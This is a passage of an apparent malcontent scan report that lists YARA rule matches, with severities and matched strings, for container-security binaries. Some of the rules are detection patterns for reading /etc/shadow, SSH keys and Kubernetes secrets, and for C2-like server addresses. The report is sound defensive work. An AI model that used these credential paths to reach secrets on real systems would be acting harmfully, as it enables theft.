[/tmp/kube_master.sh/tmp/kube_worker.sh%sbench/workload/%sGRPC](https://github.com/search?q=%2Ftmp%2Fkube_master.sh%2Ftmp%2Fkube_worker.sh%25sbench%2Fworkload%2F%25sGRPC&type=code)
[/tmp/neuvector/consul.json](https://github.com/search?q=%2Ftmp%2Fneuvector%2Fconsul.json&type=code)
[/tmp/neuvector/raft/peers.json/etc/neuvector/certs/internal/Failed](https://github.com/search?q=%2Ftmp%2Fneuvector%2Fraft%2Fpeers.json%2Fetc%2Fneuvector%2Fcerts%2Finternal%2FFailed&type=code)
[/tmp/neuvectorcan](https://github.com/search?q=%2Ftmp%2Fneuvectorcan&type=code)
[/tmp/ready](https://github.com/search?q=%2Ftmp%2Fready&type=code)
[/tmp/rh-1.4.0//tmp/cis-1.24//tmp/cis-1.23/kube-apiservercontainers](https://github.com/search?q=%2Ftmp%2Frh-1.4.0%2F%2Ftmp%2Fcis-1.24%2F%2Ftmp%2Fcis-1.23%2Fkube-apiservercontainers&type=code)
[/tmp/walkWorkload](https://github.com/search?q=%2Ftmp%2FwalkWorkload&type=code) | -| MEDIUM | [ref/path/usr/local](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/usr-local.yara#usr_local_bin_path) | path reference within /usr/local/bin | [/usr/local/bin/.nvcontainerRunning](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2F.nvcontainerRunning&type=code)
[/usr/local/bin/SHD](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FSHD&type=code)
[/usr/local/bin/admin-assembly-too](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fadmin-assembly-too&type=code)
[/usr/local/bin/agentListenSocket](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FagentListenSocket&type=code)
[/usr/local/bin/consulgrpc](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fconsulgrpc&type=code)
[/usr/local/bin/controllercontext](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fcontrollercontext&type=code)
[/usr/local/bin/dpexiting](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fdpexiting&type=code)
[/usr/local/bin/fetcher/usr/local/bin/adapterio.kubernetes.pod.nameFailed](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Ffetcher%2Fusr%2Flocal%2Fbin%2Fadapterio.kubernetes.pod.nameFailed&type=code)
[/usr/local/bin/host.tmplNode](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fhost.tmplNode&type=code)
[/usr/local/bin/kube_master_1_0_0.tmpl/usr/local/bin/kube_worker_1_0_0.tmplresc](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_0_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_0_0.tmplresc&type=code)
[/usr/local/bin/kube_master_1_2_0.tmpl/usr/local/bin/kube_worker_1_2_0.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_2_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_2_0.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_master_1_4_1.tmpl/usr/local/bin/kube_worker_1_4_1.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_4_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_4_1.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_master_1_5_1.tmpl/usr/local/bin/kube_worker_1_5_1.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_1_5_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_5_1.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_master_gke_1_0_0.tmpl/usr/local/bin/kube_worker_gke_1_0_0.](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_gke_1_0_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_gke_1_0_0.&type=code)
[/usr/local/bin/kube_master_ocp_4_3.tmpl/usr/local/bin/kube_worker_ocp_4_3.tmpl](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_ocp_4_3.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_3.tmpl&type=code)
[/usr/local/bin/kube_master_ocp_4_5.tmpl/usr/local/bin/kube_worker_ocp_4_5.tmpl](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_master_ocp_4_5.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_5.tmpl&type=code)
[/usr/local/bin/kube_runner.tmplCannot](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_runner.tmplCannot&type=code)
[/usr/local/bin/kube_worker_1_0_0.tmplreschedule](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_0_0.tmplreschedule&type=code)
[/usr/local/bin/kube_worker_1_2_0.tmpl/usr/local/bin/kube_master_1_0_0.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_2_0.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_1_0_0.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_worker_1_4_1.tmpl/usr/local/bin/kube_master_1_2_0.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_4_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_1_2_0.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_worker_1_5_1.tmpl/usr/local/bin/kube_master_1_4_1.tmpl/usr](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_1_5_1.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_1_4_1.tmpl%2Fusr&type=code)
[/usr/local/bin/kube_worker_gke_1_0_0.tmplDocker](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_gke_1_0_0.tmplDocker&type=code)
[/usr/local/bin/kube_worker_ocp_4_3.tmplexpected](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_3.tmplexpected&type=code)
[/usr/local/bin/kube_worker_ocp_4_5.tmpl/usr/local/bin/kube_master_ocp_4_3.tmpl](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkube_worker_ocp_4_5.tmpl%2Fusr%2Flocal%2Fbin%2Fkube_master_ocp_4_3.tmpl&type=code)
[/usr/local/bin/kubecis_1_2_0.rem/usr/local/bin/kubecis_1_0_0.remGet](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_2_0.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_1_0_0.remGet&type=code)
[/usr/local/bin/kubecis_1_4_1.rem/usr/local/bin/kubecis_1_2_0.rem/usr/local/bin](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_4_1.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_1_2_0.rem%2Fusr%2Flocal%2Fbin&type=code)
[/usr/local/bin/kubecis_1_5_1.rem/usr/local/bin/kubecis_1_4_1.rem/usr/local/bin](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_5_1.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_1_4_1.rem%2Fusr%2Flocal%2Fbin&type=code)
[/usr/local/bin/kubecis_1_6_0.remController](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_1_6_0.remController&type=code)
[/usr/local/bin/kubecis_gke_1_0_0.remDocker](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_gke_1_0_0.remDocker&type=code)
[/usr/local/bin/kubecis_ocp_4_5.rem/usr/local/bin/kubecis_ocp_4_3.remUnable](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fkubecis_ocp_4_5.rem%2Fusr%2Flocal%2Fbin%2Fkubecis_ocp_4_3.remUnable&type=code)
[/usr/local/bin/monitor/usr/local/bin/fetcher/usr/local/bin/adapterio.kubernete](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fmonitor%2Fusr%2Flocal%2Fbin%2Ffetcher%2Fusr%2Flocal%2Fbin%2Fadapterio.kubernete&type=code)
[/usr/local/bin/nstoolscontainer-docker-bench](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fnstoolscontainer-docker-bench&type=code)
[/usr/local/bin/opacontext.Backgroundentering](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fopacontext.Backgroundentering&type=code)
[/usr/local/bin/pathWalkershare.EnforcerScanServiceScanErrSignatureScanErrorsha](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FpathWalkershare.EnforcerScanServiceScanErrSignatureScanErrorsha&type=code)
[/usr/local/bin/progvar/lib/dpkg/statusno](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fprogvar%2Flib%2Fdpkg%2Fstatusno&type=code)
[/usr/local/bin/rh_runner.tmpl/usr/local/bin/container.tmplRunning](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Frh_runner.tmpl%2Fusr%2Flocal%2Fbin%2Fcontainer.tmplRunning&type=code)
[/usr/local/bin/scannerPROC](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FscannerPROC&type=code)
[/usr/local/bin/scannerTask/sbin/xtables-legacy-multiccBalancerWrapper](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2FscannerTask%2Fsbin%2Fxtables-legacy-multiccBalancerWrapper&type=code)
[/usr/local/bin/sigstore-interfacegrpc](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Fsigstore-interfacegrpc&type=code)
[/usr/local/bin/tcpdumpservice](https://github.com/search?q=%2Fusr%2Flocal%2Fbin%2Ftcpdumpservice&type=code)
[/usr/local/binFA](https://github.com/search?q=%2Fusr%2Flocal%2FbinFA&type=code) | -| MEDIUM | [ref/path/var/run](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/var-run.yara#var_run_subfolder) | references subfolder within /var/run | [/var/run/crio/](https://github.com/search?q=%2Fvar%2Frun%2Fcrio%2F&type=code)
[/var/run/docker.sock/](https://github.com/search?q=%2Fvar%2Frun%2Fdocker.sock%2F&type=code)
[/var/run/dockershim.sock/](https://github.com/search?q=%2Fvar%2Frun%2Fdockershim.sock%2F&type=code)
[/var/run/openvswitch/](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2F&type=code)
[/var/run/secrets/](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2F&type=code) | -| MEDIUM | [ref/words/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/exclamation.yara#exclamations) | gets very excited | [not foundNo interface!!](https://github.com/search?q=not+foundNo+interface%21%21&type=code)
[number println!!](https://github.com/search?q=number+println%21%21&type=code)
[ontain alphanumerical characters onlyexplicitly tagged !!](https://github.com/search?q=ontain+alphanumerical+characters+onlyexplicitly+tagged+%21%21&type=code) | -| MEDIUM | [ref/words/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/heartbeat.yara#heartbeat) | references a 'heartbeat' | [TxHeartbeatErrors](https://github.com/search?q=TxHeartbeatErrors&type=code) | -| MEDIUM | [ref/words/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/intercept.yara#interceptor) | References interception | [interceptor](https://github.com/search?q=interceptor&type=code) | -| MEDIUM | [ref/words/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/server_address.yara#server_address) | references a 'server address', possible C2 client | [extensionserverAddressByClientCIDRsdeletionGracePer](https://github.com/search?q=extensionserverAddressByClientCIDRsdeletionGracePer&type=code)
[preconditionsserverAddressincludeObjectfieldSelectorman](https://github.com/search?q=preconditionsserverAddressincludeObjectfieldSelectorman&type=code)
[server_address](https://github.com/search?q=server_address&type=code) | -| MEDIUM | [ref/words/spoof](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/spoof.yara#spoof) | references spoofing | [DeserializeVfSpoofchk](https://github.com/search?q=DeserializeVfSpoofchk&type=code) | -| MEDIUM | [secrets/shadow](https://github.com/chainguard-dev/malcontent/blob/main/rules/secrets/shadow.yara#etc_shadow) | accesses /etc/shadow | [/etc/shadow](https://github.com/search?q=%2Fetc%2Fshadow&type=code) | -| MEDIUM | [secrets/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/secrets/ssh.yara#ssh_folder) | [accesses SSH configuration and/or keys](https://www.sentinelone.com/blog/macos-malware-2023-a-deep-dive-into-emerging-trends-and-evolving-techniques/) | [.ssh/usr/local/binFA](https://github.com/search?q=.ssh%2Fusr%2Flocal%2FbinFA&type=code) | -| MEDIUM | [security_controls/linux/iptables](https://github.com/chainguard-dev/malcontent/blob/main/rules/security_controls/linux/iptables.yara#iptables) | [interacts with the iptables firewall](https://www.netfilter.org/projects/iptables/) | [iptables](https://github.com/search?q=iptables&type=code) | -| MEDIUM | [shell/exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/shell/exec.yara#calls_shell) | executes shell | [/bin/bash](https://github.com/search?q=%2Fbin%2Fbash&type=code)
[/bin/dash](https://github.com/search?q=%2Fbin%2Fdash&type=code)
[/bin/sh](https://github.com/search?q=%2Fbin%2Fsh&type=code) | -| LOW | [compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | -| LOW | [compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | -| LOW | [compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [(/](https://github.com/search?q=%28%B5%2F%FD&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | -| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code)
[crypto/aes](https://github.com/search?q=crypto%2Faes&type=code) | -| LOW | [crypto/ecdsa](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ecdsa.yara#crypto_ecdsa) | Uses the Go crypto/ecdsa library | [crypto/ecdsa](https://github.com/search?q=crypto%2Fecdsa&type=code) | -| LOW | [crypto/ed25519](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ed25519.yara#ed25519) | Elliptic curve algorithm used by TLS and SSH | [ed25519](https://github.com/search?q=ed25519&type=code) | -| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [TLS13](https://github.com/search?q=TLS13&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code) | -| LOW | [encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | -| LOW | [encoding/json](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/json.yara#encoding_json) | Supports JSON encoded objects | [encoding/json](https://github.com/search?q=encoding%2Fjson&type=code) | -| LOW | [encoding/json/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/json-decode.yara#jsondecode) | Decodes JSON messages | [json.Unmarshal](https://github.com/search?q=json.Unmarshal&type=code) | -| LOW | [encoding/json/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/encoding/json-encode.yara#JSONEncode) | encodes JSON | [MarshalJSON](https://github.com/search?q=MarshalJSON&type=code) | -| LOW | [env/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [env/TEMP](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/TEMP.yara#tmpdir) | tmpdir | [TEMP](https://github.com/search?q=TEMP&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [env/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | -| LOW | [env/TMPDIR](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/TMPDIR.yara#TMPDIR) | TMPDIR | [TMPDIR](https://github.com/search?q=TMPDIR&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [env/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-list.yara#GoReadDir) | Uses Go functions to list a directory | [.ReadDir](https://github.com/search?q=.ReadDir&type=code) | -| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [Rmdir](https://github.com/search?q=Rmdir&type=code)
[rmdir](https://github.com/search?q=rmdir&type=code) | -| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | -| LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-read.yara#go_file_read) | reads files | [ReadFile](https://github.com/search?q=ReadFile&type=code)
[os.(*File).Read](https://github.com/search?q=os.%28%2AFile%29.Read&type=code) | -| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate](https://github.com/search?q=ftruncate&type=code) | -| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-write.yara#file_write) | writes to file | [writeRawFile](https://github.com/search?q=writeRawFile&type=code) | -| LOW | [fs/link/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-create.yara#linkat) | May create hard file links | [linkat](https://github.com/search?q=linkat&type=code) | -| LOW | [fs/link/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | -| LOW | [fs/loopback](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/loopback.yara#loopback) | uses loopback pseudo-device files | [/dev/loop](https://github.com/search?q=%2Fdev%2Floop&type=code) | -| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | -| LOW | [fs/node/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod) | [create device files](https://man7.org/linux/man-pages/man2/mknod.2.html) | [mknod](https://github.com/search?q=mknod&type=code) | -| LOW | [fs/tempdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir.yara#tempdir) | looks up location of temp directory | [TMPDIR](https://github.com/search?q=TMPDIR&type=code) | -| LOW | [fs/tempdir/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir-create.yara#mkdtemp) | creates temporary directory | [temp dir](https://github.com/search?q=temp+dir&type=code) | -| LOW | [fs/tempfile/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [ioutil/tempfile](https://github.com/search?q=ioutil%2Ftempfile&type=code) | -| LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | -| LOW | [hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | -| LOW | [kernel/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/acct.yara#acct) | switch process accounting on or off | [radius-acct](https://github.com/search?q=radius-acct&type=code) | -| LOW | [kernel/cpu/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | -| LOW | [kernel/hostname/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) | -| LOW | [kernel/machine_id](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/machine_id.yara#machineid) | Gets a unique machineid for the host | [machineid](https://github.com/search?q=machineid&type=code) | -| LOW | [kernel/netlink](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/netlink.yara#netlink) | communicate with kernel services | [netlink](https://github.com/search?q=netlink&type=code) | -| LOW | [kernel/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [syscall.Uname](https://github.com/search?q=syscall.Uname&type=code)
[uname](https://github.com/search?q=uname&type=code) | -| LOW | [kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | -| LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [CNAMEResource](https://github.com/search?q=CNAMEResource&type=code)
[SetEDNS0](https://github.com/search?q=SetEDNS0&type=code)
[dnsmessage](https://github.com/search?q=dnsmessage&type=code) | -| LOW | [net/dns/servers](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns-servers.yara#go_dns_refs_local) | Examines local DNS servers | [CNAMEResource](https://github.com/search?q=CNAMEResource&type=code) | -| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | -| LOW | [net/grpc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/grpc.yara#grpc) | Uses the gRPC Remote Procedure Call framework | [gRPC](https://github.com/search?q=gRPC&type=code) | -| LOW | [net/hostname/resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/hostname-resolve.yara#cannot_resolve) | resolve network host name to IP address | [cannot resolve](https://github.com/search?q=cannot+resolve&type=code) | -| LOW | [net/http/accept/encoding](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-accept-encoding.yara#content_type) | [set HTTP response encoding format (example: gzip)](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Encoding) | [Accept-Encoding](https://github.com/search?q=Accept-Encoding&type=code) | -| LOW | [net/http/auth](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-auth.yara#http_auth) | makes HTTP requests with basic authentication | [WWW-Authenticate](https://github.com/search?q=WWW-Authenticate&type=code)
[Www-Authenticate](https://github.com/search?q=Www-Authenticate&type=code)
[www-authenticate](https://github.com/search?q=www-authenticate&type=code) | -| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code)
[Referer](https://github.com/search?q=Referer&type=code)
[User-Agent](https://github.com/search?q=User-Agent&type=code) | -| LOW | [net/http2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) | -| LOW | [net/http_proxy](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http_proxy.yara#proxy_auth) | [use HTTP proxy that requires authentication](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Proxy-Authorization) | [Proxy-Authorization](https://github.com/search?q=Proxy-Authorization&type=code) | -| LOW | [net/ip/send/unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) | -| LOW | [net/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [sendfile](https://github.com/search?q=sendfile&type=code)
[syscall.Sendfile](https://github.com/search?q=syscall.Sendfile&type=code) | -| LOW | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/socket/local/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-local-address.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvfrom](https://github.com/search?q=recvfrom&type=code)
[recvmsg](https://github.com/search?q=recvmsg&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | -| LOW | [net/udp/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp-receive.yara#udp_listen) | Listens for UDP responses | [ReadFromUDP](https://github.com/search?q=ReadFromUDP&type=code)
[listenUDP](https://github.com/search?q=listenUDP&type=code) | -| LOW | [net/udp/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp-send.yara#udp_send) | Sends UDP packets | [DialUDP](https://github.com/search?q=DialUDP&type=code)
[WriteMsgUDP](https://github.com/search?q=WriteMsgUDP&type=code) | -| LOW | [net/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url.yara#url_handle) | Handles URL strings | [RequestURI](https://github.com/search?q=RequestURI&type=code) | -| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd](https://github.com/search?q=cd&type=code) | -| LOW | [process/groupid/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real, effective, and saved group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | -| LOW | [process/groups/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/namespace/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/namespace-set.yara#setns) | associate thread or process with a namespace | [setns](https://github.com/search?q=setns&type=code) | -| LOW | [process/userid/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | -| LOW | [ref/path/bin/su](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/bin-su.yara#bin_su) | Calls /bin/su | [/bin/su](https://github.com/search?q=%2Fbin%2Fsu&type=code) | -| LOW | [ref/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc.yara#etc_path) | path reference within /etc | [/etc/apache/mime.typeshpack](https://github.com/search?q=%2Fetc%2Fapache%2Fmime.typeshpack&type=code)
[/etc/centos-release/etc/debian](https://github.com/search?q=%2Fetc%2Fcentos-release%2Fetc%2Fdebian&type=code)
[/etc/crio/crio.conf.d/](https://github.com/search?q=%2Fetc%2Fcrio%2Fcrio.conf.d%2F&type=code)
[/etc/crio/crio.conf/run/containerd/co](https://github.com/search?q=%2Fetc%2Fcrio%2Fcrio.conf%2Frun%2Fcontainerd%2Fco&type=code)
[/etc/groupmemory.max](https://github.com/search?q=%2Fetc%2Fgroupmemory.max&type=code)
[/etc/hostnamecri](https://github.com/search?q=%2Fetc%2Fhostnamecri&type=code)
